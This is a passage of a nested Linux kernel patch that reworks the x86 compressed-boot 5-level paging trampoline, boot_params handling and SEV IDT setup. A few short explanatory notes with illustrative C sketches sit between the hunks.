+-#ifdef CONFIG_EFI_STUB
+-/*
+- * If we were loaded via the EFI LoadImage service, startup_32 will be at an
+- * offset to the start of the space allocated for the image. efi_pe_entry will
+- * set up image_offset to tell us where the image actually starts, so that we
+- * can use the full available buffer.
+- *	image_offset = startup_32 - image_base
+- * Otherwise image_offset will be zero and has no effect on the calculations.
+- */
+-	movl    image_offset(%rip), %eax
+-	subq	%rax, %rbp
+-#endif
+-
+ 	movl	BP_kernel_alignment(%rsi), %eax
+ 	decl	%eax
+ 	addq	%rax, %rbp
+@@ -424,10 +352,6 @@ SYM_CODE_START(startup_64)
+ 	 * For the trampoline, we need the top page table to reside in lower
+ 	 * memory as we don't have a way to load 64-bit values into CR3 in
+ 	 * 32-bit mode.
+-	 *
+-	 * We go though the trampoline even if we don't have to: if we're
+-	 * already in a desired paging mode. This way the trampoline code gets
+-	 * tested on every boot.
+ 	 */
+ 
+ 	/* Make sure we have GDT with 32-bit code segment */
+@@ -442,10 +366,14 @@ SYM_CODE_START(startup_64)
+ 	lretq
+ 
+ .Lon_kernel_cs:
++	/*
++	 * RSI holds a pointer to a boot_params structure provided by the
++	 * loader, and this needs to be preserved across C function calls. So
++	 * move it into a callee-saved register.
++	 */
++	movq	%rsi, %r15
+ 
+-	pushq	%rsi
+ 	call	load_stage1_idt
+-	popq	%rsi
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	/*
+@@ -456,82 +384,24 @@ SYM_CODE_START(startup_64)
+ 	 * CPUID instructions being issued, so go ahead and do that now via
+ 	 * sev_enable(), which will also handle the rest of the SEV-related
+ 	 * detection/setup to ensure that has been done in advance of any dependent
+-	 * code.
++	 * code. Pass the boot_params pointer as the first argument.
+ 	 */
+-	pushq	%rsi
+-	movq	%rsi, %rdi		/* real mode address */
++	movq	%r15, %rdi
+ 	call	sev_enable
+-	popq	%rsi
+ #endif
+ 
+ 	/*
+-	 * paging_prepare() sets up the trampoline and checks if we need to
+-	 * enable 5-level paging.
+-	 *
+-	 * paging_prepare() returns a two-quadword structure which lands
+-	 * into RDX:RAX:
+-	 *   - Address of the trampoline is returned in RAX.
+-	 *   - Non zero RDX means trampoline needs to enable 5-level
+-	 *     paging.
+-	 *
+-	 * RSI holds real mode data and needs to be preserved across
+-	 * this function call.
+-	 */
+-	pushq	%rsi
+-	movq	%rsi, %rdi		/* real mode address */
+-	call	paging_prepare
+-	popq	%rsi
+-
+-	/* Save the trampoline address in RCX */
+-	movq	%rax, %rcx
+-
+-	/* Set up 32-bit addressable stack */
+-	leaq	TRAMPOLINE_32BIT_STACK_END(%rcx), %rsp
+-
+-	/*
+-	 * Preserve live 64-bit registers on the stack: this is necessary
+-	 * because the architecture does not guarantee that GPRs will retain
+-	 * their full 64-bit values across a 32-bit mode switch.
+-	 */
+-	pushq	%rbp
+-	pushq	%rbx
+-	pushq	%rsi
+-
+-	/*
+-	 * Push the 64-bit address of trampoline_return() onto the new stack.
+-	 * It will be used by the trampoline to return to the main code. Due to
+-	 * the 32-bit mode switch, it cannot be kept it in a register either.
+-	 */
+-	leaq	trampoline_return(%rip), %rdi
+-	pushq	%rdi
+-
+-	/* Switch to compatibility mode (CS.L = 0 CS.D = 1) via far return */
+-	pushq	$__KERNEL32_CS
+-	leaq	TRAMPOLINE_32BIT_CODE_OFFSET(%rax), %rax
+-	pushq	%rax
+-	lretq
+-trampoline_return:
+-	/* Restore live 64-bit registers */
+-	popq	%rsi
+-	popq	%rbx
+-	popq	%rbp
+-
+-	/* Restore the stack, the 32-bit trampoline uses its own stack */
+-	leaq	rva(boot_stack_end)(%rbx), %rsp
+-
+-	/*
+-	 * cleanup_trampoline() would restore trampoline memory.
+-	 *
+-	 * RDI is address of the page table to use instead of page table
+-	 * in trampoline memory (if required).
++	 * configure_5level_paging() updates the number of paging levels using
++	 * a trampoline in 32-bit addressable memory if the current number does
++	 * not match the desired number.
+ 	 *
+-	 * RSI holds real mode data and needs to be preserved across
+-	 * this function call.
++	 * Pass the boot_params pointer as the first argument. The second
++	 * argument is the relocated address of the page table to use instead
++	 * of the page table in trampoline memory (if required).
+ 	 */
+-	pushq	%rsi
+-	leaq	rva(top_pgtable)(%rbx), %rdi
+-	call	cleanup_trampoline
+-	popq	%rsi
++	movq	%r15, %rdi
++	leaq	rva(top_pgtable)(%rbx), %rsi
++	call	configure_5level_paging
+ 
+ 	/* Zero EFLAGS */
+ 	pushq	$0
+@@ -541,7 +411,6 @@ trampoline_return:
+  * Copy the compressed kernel to the end of our buffer
+  * where decompression in place becomes safe.
+  */
+-	pushq	%rsi
+ 	leaq	(_bss-8)(%rip), %rsi
+ 	leaq	rva(_bss-8)(%rbx), %rdi
+ 	movl	$(_bss - startup_32), %ecx
+@@ -549,7 +418,6 @@ trampoline_return:
+ 	std
+ 	rep	movsq
+ 	cld
+-	popq	%rsi
+ 
+ 	/*
+ 	 * The GDT may get overwritten either during the copy we just did or
+@@ -568,19 +436,6 @@ trampoline_return:
+ 	jmp	*%rax
+ SYM_CODE_END(startup_64)
+ 
+-#ifdef CONFIG_EFI_STUB
+-	.org 0x390
+-SYM_FUNC_START(efi64_stub_entry)
+-	and	$~0xf, %rsp			/* realign the stack */
+-	movq	%rdx, %rbx			/* save boot_params pointer */
+-	call	efi_main
+-	movq	%rbx,%rsi
+-	leaq	rva(startup_64)(%rax), %rax
+-	jmp	*%rax
+-SYM_FUNC_END(efi64_stub_entry)
+-SYM_FUNC_ALIAS(efi_stub_entry, efi64_stub_entry)
+-#endif
+-
+ 	.text
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+ 
+@@ -594,125 +449,122 @@ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+ 	shrq	$3, %rcx
+ 	rep	stosq
+ 
+-	pushq	%rsi
+ 	call	load_stage2_idt
+ 
+ 	/* Pass boot_params to initialize_identity_maps() */
+-	movq	(%rsp), %rdi
++	movq	%r15, %rdi
+ 	call	initialize_identity_maps
+-	popq	%rsi
+ 
+ /*
+  * Do the extraction, and jump to the new kernel..
+  */
+-	pushq	%rsi			/* Save the real mode argument */
+-	movq	%rsi, %rdi		/* real mode address */
+-	leaq	boot_heap(%rip), %rsi	/* malloc area for uncompression */
+-	leaq	input_data(%rip), %rdx  /* input_data */
+-	movl	input_len(%rip), %ecx	/* input_len */
+-	movq	%rbp, %r8		/* output target address */
+-	movl	output_len(%rip), %r9d	/* decompressed length, end of relocs */
+-	call	extract_kernel		/* returns kernel location in %rax */
+-	popq	%rsi
++	/* pass struct boot_params pointer and output target address */
++	movq	%r15, %rdi
++	movq	%rbp, %rsi
++	call	extract_kernel		/* returns kernel entry point in %rax */
+ 
+ /*
+  * Jump to the decompressed kernel.
+  */
++	movq	%r15, %rsi
+ 	jmp	*%rax
+ SYM_FUNC_END(.Lrelocated)
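
After this rework, extract_kernel() takes just the boot_params pointer and the output buffer and returns the entry point, as the call above shows. A hypothetical restatement of the slimmed-down prototype (body elided; the heap, input pointer and lengths are now resolved inside misc.c itself):

#include <linux/linkage.h>

asmlinkage void *extract_kernel(void *rmode /* struct boot_params * */,
				unsigned char *output);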
+ 
+-	.code32
+ /*
+- * This is the 32-bit trampoline that will be copied over to low memory.
++ * This is the 32-bit trampoline that will be copied over to low memory. It
++ * will be called using the ordinary 64-bit calling convention from code
++ * running in 64-bit mode.
+  *
+  * Return address is at the top of the stack (might be above 4G).
+- * ECX contains the base address of the trampoline memory.
+- * Non zero RDX means trampoline needs to enable 5-level paging.
++ * The first argument (EDI) contains the address of the temporary PGD level
++ * page table in 32-bit addressable memory which will be programmed into
++ * register CR3.
+  */
++	.section ".rodata", "a", @progbits
+ SYM_CODE_START(trampoline_32bit_src)
+-	/* Set up data and stack segments */
+-	movl	$__KERNEL_DS, %eax
+-	movl	%eax, %ds
+-	movl	%eax, %ss
++	/*
++	 * Preserve callee-saved 64-bit registers on the stack: this is
++	 * necessary because the architecture does not guarantee that GPRs will
++	 * retain their full 64-bit values across a 32-bit mode switch.
++	 */
++	pushq	%r15
++	pushq	%r14
++	pushq	%r13
++	pushq	%r12
++	pushq	%rbp
++	pushq	%rbx
++
++	/* Preserve top half of RSP in a legacy mode GPR to avoid truncation */
++	movq	%rsp, %rbx
++	shrq	$32, %rbx
+ 
++	/* Switch to compatibility mode (CS.L = 0 CS.D = 1) via far return */
++	pushq	$__KERNEL32_CS
++	leaq	0f(%rip), %rax
++	pushq	%rax
++	lretq
++
++	/*
++	 * The 32-bit code below will do a far jump back to long mode and end
++	 * up here after reconfiguring the number of paging levels. First, the
++	 * stack pointer needs to be restored to its full 64-bit value before
++	 * the callee save register contents can be popped from the stack.
++	 */
++.Lret:
++	shlq	$32, %rbx
++	orq	%rbx, %rsp
++
++	/* Restore the preserved 64-bit registers */
++	popq	%rbx
++	popq	%rbp
++	popq	%r12
++	popq	%r13
++	popq	%r14
++	popq	%r15
++	retq
++
++	.code32
++0:
+ 	/* Disable paging */
+ 	movl	%cr0, %eax
+ 	btrl	$X86_CR0_PG_BIT, %eax
+ 	movl	%eax, %cr0
+ 
+-	/* Check what paging mode we want to be in after the trampoline */
+-	testl	%edx, %edx
+-	jz	1f
+-
+-	/* We want 5-level paging: don't touch CR3 if it already points to 5-level page tables */
+-	movl	%cr4, %eax
+-	testl	$X86_CR4_LA57, %eax
+-	jnz	3f
+-	jmp	2f
+-1:
+-	/* We want 4-level paging: don't touch CR3 if it already points to 4-level page tables */
+-	movl	%cr4, %eax
+-	testl	$X86_CR4_LA57, %eax
+-	jz	3f
+-2:
+ 	/* Point CR3 to the trampoline's new top level page table */
+-	leal	TRAMPOLINE_32BIT_PGTABLE_OFFSET(%ecx), %eax
+-	movl	%eax, %cr3
+-3:
++	movl	%edi, %cr3
++
+ 	/* Set EFER.LME=1 as a precaution in case hypervisor pulls the rug */
+-	pushl	%ecx
+-	pushl	%edx
+ 	movl	$MSR_EFER, %ecx
+ 	rdmsr
+ 	btsl	$_EFER_LME, %eax
+ 	/* Avoid writing EFER if no change was made (for TDX guest) */
+ 	jc	1f
+ 	wrmsr
+-1:	popl	%edx
+-	popl	%ecx
+-
+-#ifdef CONFIG_X86_MCE
+-	/*
+-	 * Preserve CR4.MCE if the kernel will enable #MC support.
+-	 * Clearing MCE may fault in some environments (that also force #MC
+-	 * support). Any machine check that occurs before #MC support is fully
+-	 * configured will crash the system regardless of the CR4.MCE value set
+-	 * here.
+-	 */
+-	movl	%cr4, %eax
+-	andl	$X86_CR4_MCE, %eax
+-#else
+-	movl	$0, %eax
+-#endif
+-
+-	/* Enable PAE and LA57 (if required) paging modes */
+-	orl	$X86_CR4_PAE, %eax
+-	testl	%edx, %edx
+-	jz	1f
+-	orl	$X86_CR4_LA57, %eax
+ 1:
++	/* Toggle CR4.LA57 */
++	movl	%cr4, %eax
++	btcl	$X86_CR4_LA57_BIT, %eax
+ 	movl	%eax, %cr4
+ 
+-	/* Calculate address of paging_enabled() once we are executing in the trampoline */
+-	leal	.Lpaging_enabled - trampoline_32bit_src + TRAMPOLINE_32BIT_CODE_OFFSET(%ecx), %eax
+-
+-	/* Prepare the stack for far return to Long Mode */
+-	pushl	$__KERNEL_CS
+-	pushl	%eax
+-
+ 	/* Enable paging again. */
+ 	movl	%cr0, %eax
+ 	btsl	$X86_CR0_PG_BIT, %eax
+ 	movl	%eax, %cr0
+ 
+-	lret
++	/*
++	 * Return to the 64-bit calling code using LJMP rather than LRET, to
++	 * avoid the need for a 32-bit addressable stack. The destination
++	 * address will be adjusted after the template code is copied into a
++	 * 32-bit addressable buffer.
++	 */
++.Ljmp:	ljmpl	$__KERNEL_CS, $(.Lret - trampoline_32bit_src)
+ SYM_CODE_END(trampoline_32bit_src)
+ 
+-	.code64
+-SYM_FUNC_START_LOCAL_NOALIGN(.Lpaging_enabled)
+-	/* Return from the trampoline */
+-	retq
+-SYM_FUNC_END(.Lpaging_enabled)
++/*
++ * This symbol is placed right after trampoline_32bit_src() so its address can
++ * be used to infer the size of the trampoline code.
++ */
++SYM_DATA(trampoline_ljmp_imm_offset, .word  .Ljmp + 1 - trampoline_32bit_src)
+ 
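
trampoline_ljmp_imm_offset lets the C code that copies this template into its 32-bit addressable buffer patch the ljmpl immediate, which was assembled as an offset relative to trampoline_32bit_src. A rough sketch of that fixup, with hypothetical names for the copy step (the real logic lives in the pgtable setup code):

#include <stdint.h>
#include <string.h>

extern const uint8_t trampoline_32bit_src[];
extern const uint16_t trampoline_ljmp_imm_offset;

/* Hypothetical: copy the template and rebase the ljmp target so it points
 * at .Lret inside the copy rather than inside the template. */
static void install_trampoline(uint8_t *dst, size_t size)
{
	uint32_t *imm;

	memcpy(dst, trampoline_32bit_src, size);
	imm = (uint32_t *)(dst + trampoline_ljmp_imm_offset);
	*imm += (uint32_t)(uintptr_t)dst;	/* offset -> absolute 32-bit address */
}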
+ 	/*
+          * The trampoline code has a size limit.
+@@ -721,7 +573,7 @@ SYM_FUNC_END(.Lpaging_enabled)
+ 	 */
+ 	.org	trampoline_32bit_src + TRAMPOLINE_32BIT_CODE_SIZE
+ 
+-	.code32
++	.text
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lno_longmode)
+ 	/* This isn't an x86-64 CPU, so hang intentionally, we cannot continue */
+ 1:
+@@ -729,6 +581,7 @@ SYM_FUNC_START_LOCAL_NOALIGN(.Lno_longmode)
+ 	jmp     1b
+ SYM_FUNC_END(.Lno_longmode)
+ 
++	.globl	verify_cpu
+ #include "../../kernel/verify_cpu.S"
+ 
+ 	.data
+@@ -760,249 +613,11 @@ SYM_DATA_START(boot_idt)
+ 	.endr
+ SYM_DATA_END_LABEL(boot_idt, SYM_L_GLOBAL, boot_idt_end)
+ 
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-SYM_DATA_START(boot32_idt_desc)
+-	.word   boot32_idt_end - boot32_idt - 1
+-	.long   0
+-SYM_DATA_END(boot32_idt_desc)
+-	.balign 8
+-SYM_DATA_START(boot32_idt)
+-	.rept 32
+-	.quad 0
+-	.endr
+-SYM_DATA_END_LABEL(boot32_idt, SYM_L_GLOBAL, boot32_idt_end)
+-#endif
+-
+-#ifdef CONFIG_EFI_STUB
+-SYM_DATA(image_offset, .long 0)
+-#endif
+-#ifdef CONFIG_EFI_MIXED
+-SYM_DATA_LOCAL(efi32_boot_args, .long 0, 0, 0)
+-SYM_DATA(efi_is64, .byte 1)
+-
+-#define ST32_boottime		60 // offsetof(efi_system_table_32_t, boottime)
+-#define BS32_handle_protocol	88 // offsetof(efi_boot_services_32_t, handle_protocol)
+-#define LI32_image_base		32 // offsetof(efi_loaded_image_32_t, image_base)
+-
+-	__HEAD
+-	.code32
+-SYM_FUNC_START(efi32_pe_entry)
+-/*
+- * efi_status_t efi32_pe_entry(efi_handle_t image_handle,
+- *			       efi_system_table_32_t *sys_table)
+- */
+-
+-	pushl	%ebp
+-	movl	%esp, %ebp
+-	pushl	%eax				// dummy push to allocate loaded_image
+-
+-	pushl	%ebx				// save callee-save registers
+-	pushl	%edi
+-
+-	call	verify_cpu			// check for long mode support
+-	testl	%eax, %eax
+-	movl	$0x80000003, %eax		// EFI_UNSUPPORTED
+-	jnz	2f
+-
+-	call	1f
+-1:	pop	%ebx
+-	subl	$ rva(1b), %ebx
+-
+-	/* Get the loaded image protocol pointer from the image handle */
+-	leal	-4(%ebp), %eax
+-	pushl	%eax				// &loaded_image
+-	leal	rva(loaded_image_proto)(%ebx), %eax
+-	pushl	%eax				// pass the GUID address
+-	pushl	8(%ebp)				// pass the image handle
+-
+-	/*
+-	 * Note the alignment of the stack frame.
+-	 *   sys_table
+-	 *   handle             <-- 16-byte aligned on entry by ABI
+-	 *   return address
+-	 *   frame pointer
+-	 *   loaded_image       <-- local variable
+-	 *   saved %ebx		<-- 16-byte aligned here
+-	 *   saved %edi
+-	 *   &loaded_image
+-	 *   &loaded_image_proto
+-	 *   handle             <-- 16-byte aligned for call to handle_protocol
+-	 */
+-
+-	movl	12(%ebp), %eax			// sys_table
+-	movl	ST32_boottime(%eax), %eax	// sys_table->boottime
+-	call	*BS32_handle_protocol(%eax)	// sys_table->boottime->handle_protocol
+-	addl	$12, %esp			// restore argument space
+-	testl	%eax, %eax
+-	jnz	2f
+-
+-	movl	8(%ebp), %ecx			// image_handle
+-	movl	12(%ebp), %edx			// sys_table
+-	movl	-4(%ebp), %esi			// loaded_image
+-	movl	LI32_image_base(%esi), %esi	// loaded_image->image_base
+-	movl	%ebx, %ebp			// startup_32 for efi32_pe_stub_entry
+-	/*
+-	 * We need to set the image_offset variable here since startup_32() will
+-	 * use it before we get to the 64-bit efi_pe_entry() in C code.
+-	 */
+-	subl	%esi, %ebx
+-	movl	%ebx, rva(image_offset)(%ebp)	// save image_offset
+-	jmp	efi32_pe_stub_entry
+-
+-2:	popl	%edi				// restore callee-save registers
+-	popl	%ebx
+-	leave
+-	RET
+-SYM_FUNC_END(efi32_pe_entry)
+-
+-	.section ".rodata"
+-	/* EFI loaded image protocol GUID */
+-	.balign 4
+-SYM_DATA_START_LOCAL(loaded_image_proto)
+-	.long	0x5b1b31a1
+-	.word	0x9562, 0x11d2
+-	.byte	0x8e, 0x3f, 0x00, 0xa0, 0xc9, 0x69, 0x72, 0x3b
+-SYM_DATA_END(loaded_image_proto)
+-#endif
+-
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-	__HEAD
+-	.code32
+-/*
+- * Write an IDT entry into boot32_idt
+- *
+- * Parameters:
+- *
+- * %eax:	Handler address
+- * %edx:	Vector number
+- *
+- * Physical offset is expected in %ebp
+- */
+-SYM_FUNC_START(startup32_set_idt_entry)
+-	push    %ebx
+-	push    %ecx
+-
+-	/* IDT entry address to %ebx */
+-	leal    rva(boot32_idt)(%ebp), %ebx
+-	shl	$3, %edx
+-	addl    %edx, %ebx
+-
+-	/* Build IDT entry, lower 4 bytes */
+-	movl    %eax, %edx
+-	andl    $0x0000ffff, %edx	# Target code segment offset [15:0]
+-	movl    $__KERNEL32_CS, %ecx	# Target code segment selector
+-	shl     $16, %ecx
+-	orl     %ecx, %edx
+-
+-	/* Store lower 4 bytes to IDT */
+-	movl    %edx, (%ebx)
+-
+-	/* Build IDT entry, upper 4 bytes */
+-	movl    %eax, %edx
+-	andl    $0xffff0000, %edx	# Target code segment offset [31:16]
+-	orl     $0x00008e00, %edx	# Present, Type 32-bit Interrupt Gate
+-
+-	/* Store upper 4 bytes to IDT */
+-	movl    %edx, 4(%ebx)
+-
+-	pop     %ecx
+-	pop     %ebx
+-	RET
+-SYM_FUNC_END(startup32_set_idt_entry)
+-#endif
+-
+-SYM_FUNC_START(startup32_load_idt)
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-	/* #VC handler */
+-	leal    rva(startup32_vc_handler)(%ebp), %eax
+-	movl    $X86_TRAP_VC, %edx
+-	call    startup32_set_idt_entry
+-
+-	/* Load IDT */
+-	leal	rva(boot32_idt)(%ebp), %eax
+-	movl	%eax, rva(boot32_idt_desc+2)(%ebp)
+-	lidt    rva(boot32_idt_desc)(%ebp)
+-#endif
+-	RET
+-SYM_FUNC_END(startup32_load_idt)
+-
+-/*
+- * Check for the correct C-bit position when the startup_32 boot-path is used.
+- *
+- * The check makes use of the fact that all memory is encrypted when paging is
+- * disabled. The function creates 64 bits of random data using the RDRAND
+- * instruction. RDRAND is mandatory for SEV guests, so always available. If the
+- * hypervisor violates that the kernel will crash right here.
+- *
+- * The 64 bits of random data are stored to a memory location and at the same
+- * time kept in the %eax and %ebx registers. Since encryption is always active
+- * when paging is off the random data will be stored encrypted in main memory.
+- *
+- * Then paging is enabled. When the C-bit position is correct all memory is
+- * still mapped encrypted and comparing the register values with memory will
+- * succeed. An incorrect C-bit position will map all memory unencrypted, so that
+- * the compare will use the encrypted random data and fail.
+- */
+-SYM_FUNC_START(startup32_check_sev_cbit)
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-	pushl	%eax
+-	pushl	%ebx
+-	pushl	%ecx
+-	pushl	%edx
+-
+-	/* Check for non-zero sev_status */
+-	movl	rva(sev_status)(%ebp), %eax
+-	testl	%eax, %eax
+-	jz	4f
+-
+-	/*
+-	 * Get two 32-bit random values - Don't bail out if RDRAND fails
+-	 * because it is better to prevent forward progress if no random value
+-	 * can be gathered.
+-	 */
+-1:	rdrand	%eax
+-	jnc	1b
+-2:	rdrand	%ebx
+-	jnc	2b
+-
+-	/* Store to memory and keep it in the registers */
+-	movl	%eax, rva(sev_check_data)(%ebp)
+-	movl	%ebx, rva(sev_check_data+4)(%ebp)
+-
+-	/* Enable paging to see if encryption is active */
+-	movl	%cr0, %edx			 /* Backup %cr0 in %edx */
+-	movl	$(X86_CR0_PG | X86_CR0_PE), %ecx /* Enable Paging and Protected mode */
+-	movl	%ecx, %cr0
+-
+-	cmpl	%eax, rva(sev_check_data)(%ebp)
+-	jne	3f
+-	cmpl	%ebx, rva(sev_check_data+4)(%ebp)
+-	jne	3f
+-
+-	movl	%edx, %cr0	/* Restore previous %cr0 */
+-
+-	jmp	4f
+-
+-3:	/* Check failed - hlt the machine */
+-	hlt
+-	jmp	3b
+-
+-4:
+-	popl	%edx
+-	popl	%ecx
+-	popl	%ebx
+-	popl	%eax
+-#endif
+-	RET
+-SYM_FUNC_END(startup32_check_sev_cbit)
+-
+ /*
+  * Stack and heap for uncompression
+  */
+ 	.bss
+ 	.balign 4
+-SYM_DATA_LOCAL(boot_heap,	.fill BOOT_HEAP_SIZE, 1, 0)
+-
+ SYM_DATA_START_LOCAL(boot_stack)
+ 	.fill BOOT_STACK_SIZE, 1, 0
+ 	.balign 16
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index d34222816c9f5..b8c42339bc355 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -167,8 +167,9 @@ void initialize_identity_maps(void *rmode)
+ 	 * or does not touch all the pages covering them.
+ 	 */
+ 	kernel_add_identity_map((unsigned long)_head, (unsigned long)_end);
+-	boot_params = rmode;
+-	kernel_add_identity_map((unsigned long)boot_params, (unsigned long)(boot_params + 1));
++	boot_params_ptr = rmode;
++	kernel_add_identity_map((unsigned long)boot_params_ptr,
++				(unsigned long)(boot_params_ptr + 1));
+ 	cmdline = get_cmd_line_ptr();
+ 	kernel_add_identity_map(cmdline, cmdline + COMMAND_LINE_SIZE);
+ 
+@@ -176,7 +177,7 @@ void initialize_identity_maps(void *rmode)
+ 	 * Also map the setup_data entries passed via boot_params in case they
+ 	 * need to be accessed by uncompressed kernel via the identity mapping.
+ 	 */
+-	sd = (struct setup_data *)boot_params->hdr.setup_data;
++	sd = (struct setup_data *)boot_params_ptr->hdr.setup_data;
+ 	while (sd) {
+ 		unsigned long sd_addr = (unsigned long)sd;
+ 
+diff --git a/arch/x86/boot/compressed/kaslr.c b/arch/x86/boot/compressed/kaslr.c
+index e476bcbd9b422..9794d9174795d 100644
+--- a/arch/x86/boot/compressed/kaslr.c
++++ b/arch/x86/boot/compressed/kaslr.c
+@@ -63,7 +63,7 @@ static unsigned long get_boot_seed(void)
+ 	unsigned long hash = 0;
+ 
+ 	hash = rotate_xor(hash, build_str, sizeof(build_str));
+-	hash = rotate_xor(hash, boot_params, sizeof(*boot_params));
++	hash = rotate_xor(hash, boot_params_ptr, sizeof(*boot_params_ptr));
+ 
+ 	return hash;
+ }
+@@ -383,7 +383,7 @@ static void handle_mem_options(void)
+ static void mem_avoid_init(unsigned long input, unsigned long input_size,
+ 			   unsigned long output)
+ {
+-	unsigned long init_size = boot_params->hdr.init_size;
++	unsigned long init_size = boot_params_ptr->hdr.init_size;
+ 	u64 initrd_start, initrd_size;
+ 	unsigned long cmd_line, cmd_line_size;
+ 
+@@ -395,10 +395,10 @@ static void mem_avoid_init(unsigned long input, unsigned long input_size,
+ 	mem_avoid[MEM_AVOID_ZO_RANGE].size = (output + init_size) - input;
+ 
+ 	/* Avoid initrd. */
+-	initrd_start  = (u64)boot_params->ext_ramdisk_image << 32;
+-	initrd_start |= boot_params->hdr.ramdisk_image;
+-	initrd_size  = (u64)boot_params->ext_ramdisk_size << 32;
+-	initrd_size |= boot_params->hdr.ramdisk_size;
++	initrd_start  = (u64)boot_params_ptr->ext_ramdisk_image << 32;
++	initrd_start |= boot_params_ptr->hdr.ramdisk_image;
++	initrd_size  = (u64)boot_params_ptr->ext_ramdisk_size << 32;
++	initrd_size |= boot_params_ptr->hdr.ramdisk_size;
+ 	mem_avoid[MEM_AVOID_INITRD].start = initrd_start;
+ 	mem_avoid[MEM_AVOID_INITRD].size = initrd_size;
+ 	/* No need to set mapping for initrd, it will be handled in VO. */
+@@ -413,8 +413,8 @@ static void mem_avoid_init(unsigned long input, unsigned long input_size,
+ 	}
+ 
+ 	/* Avoid boot parameters. */
+-	mem_avoid[MEM_AVOID_BOOTPARAMS].start = (unsigned long)boot_params;
+-	mem_avoid[MEM_AVOID_BOOTPARAMS].size = sizeof(*boot_params);
++	mem_avoid[MEM_AVOID_BOOTPARAMS].start = (unsigned long)boot_params_ptr;
++	mem_avoid[MEM_AVOID_BOOTPARAMS].size = sizeof(*boot_params_ptr);
+ 
+ 	/* We don't need to set a mapping for setup_data. */
+ 
+@@ -447,7 +447,7 @@ static bool mem_avoid_overlap(struct mem_vector *img,
+ 	}
+ 
+ 	/* Avoid all entries in the setup_data linked list. */
+-	ptr = (struct setup_data *)(unsigned long)boot_params->hdr.setup_data;
++	ptr = (struct setup_data *)(unsigned long)boot_params_ptr->hdr.setup_data;
+ 	while (ptr) {
+ 		struct mem_vector avoid;
+ 
+@@ -679,7 +679,7 @@ static bool process_mem_region(struct mem_vector *region,
+ static bool
+ process_efi_entries(unsigned long minimum, unsigned long image_size)
+ {
+-	struct efi_info *e = &boot_params->efi_info;
++	struct efi_info *e = &boot_params_ptr->efi_info;
+ 	bool efi_mirror_found = false;
+ 	struct mem_vector region;
+ 	efi_memory_desc_t *md;
+@@ -761,8 +761,8 @@ static void process_e820_entries(unsigned long minimum,
+ 	struct boot_e820_entry *entry;
+ 
+ 	/* Verify potential e820 positions, appending to slots list. */
+-	for (i = 0; i < boot_params->e820_entries; i++) {
+-		entry = &boot_params->e820_table[i];
++	for (i = 0; i < boot_params_ptr->e820_entries; i++) {
++		entry = &boot_params_ptr->e820_table[i];
+ 		/* Skip non-RAM entries. */
+ 		if (entry->type != E820_TYPE_RAM)
+ 			continue;
+@@ -836,7 +836,7 @@ void choose_random_location(unsigned long input,
+ 		return;
+ 	}
+ 
+-	boot_params->hdr.loadflags |= KASLR_FLAG;
++	boot_params_ptr->hdr.loadflags |= KASLR_FLAG;
+ 
+ 	if (IS_ENABLED(CONFIG_X86_32))
+ 		mem_limit = KERNEL_IMAGE_SIZE;
+diff --git a/arch/x86/boot/compressed/mem_encrypt.S b/arch/x86/boot/compressed/mem_encrypt.S
+index a73e4d783cae2..32f7cc8a86254 100644
+--- a/arch/x86/boot/compressed/mem_encrypt.S
++++ b/arch/x86/boot/compressed/mem_encrypt.S
+@@ -12,16 +12,13 @@
+ #include <asm/processor-flags.h>
+ #include <asm/msr.h>
+ #include <asm/asm-offsets.h>
++#include <asm/segment.h>
++#include <asm/trapnr.h>
+ 
+ 	.text
+ 	.code32
+ SYM_FUNC_START(get_sev_encryption_bit)
+-	xor	%eax, %eax
+-
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	push	%ebx
+-	push	%ecx
+-	push	%edx
+ 
+ 	movl	$0x80000000, %eax	/* CPUID to check the highest leaf */
+ 	cpuid
+@@ -52,12 +49,7 @@ SYM_FUNC_START(get_sev_encryption_bit)
+ 	xor	%eax, %eax
+ 
+ .Lsev_exit:
+-	pop	%edx
+-	pop	%ecx
+ 	pop	%ebx
+-
+-#endif	/* CONFIG_AMD_MEM_ENCRYPT */
+-
+ 	RET
+ SYM_FUNC_END(get_sev_encryption_bit)
+ 
+@@ -98,7 +90,7 @@ SYM_CODE_START_LOCAL(sev_es_req_cpuid)
+ 	jmp	1b
+ SYM_CODE_END(sev_es_req_cpuid)
+ 
+-SYM_CODE_START(startup32_vc_handler)
++SYM_CODE_START_LOCAL(startup32_vc_handler)
+ 	pushl	%eax
+ 	pushl	%ebx
+ 	pushl	%ecx
+@@ -184,15 +176,149 @@ SYM_CODE_START(startup32_vc_handler)
+ 	jmp .Lfail
+ SYM_CODE_END(startup32_vc_handler)
+ 
++/*
++ * Write an IDT entry into boot32_idt
++ *
++ * Parameters:
++ *
++ * %eax:	Handler address
++ * %edx:	Vector number
++ * %ecx:	IDT address
++ */
++SYM_FUNC_START_LOCAL(startup32_set_idt_entry)
++	/* IDT entry address to %ecx */
++	leal	(%ecx, %edx, 8), %ecx
++
++	/* Build IDT entry, lower 4 bytes */
++	movl    %eax, %edx
++	andl    $0x0000ffff, %edx		# Target code segment offset [15:0]
++	orl	$(__KERNEL32_CS << 16), %edx	# Target code segment selector
++
++	/* Store lower 4 bytes to IDT */
++	movl    %edx, (%ecx)
++
++	/* Build IDT entry, upper 4 bytes */
++	movl    %eax, %edx
++	andl    $0xffff0000, %edx	# Target code segment offset [31:16]
++	orl     $0x00008e00, %edx	# Present, Type 32-bit Interrupt Gate
++
++	/* Store upper 4 bytes to IDT */
++	movl    %edx, 4(%ecx)
++
++	RET
++SYM_FUNC_END(startup32_set_idt_entry)
++
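
The two stores in startup32_set_idt_entry() assemble a 32-bit interrupt gate descriptor. In C, the packing looks like the following sketch (descriptor layout per the IA-32 SDM; the selector parameter stands in for __KERNEL32_CS):

#include <stdint.h>

struct idt_gate {
	uint32_t low;	/* offset[15:0] | selector << 16 */
	uint32_t high;	/* offset[31:16] | P=1, DPL=0, type=0xE (32-bit intr gate) */
};

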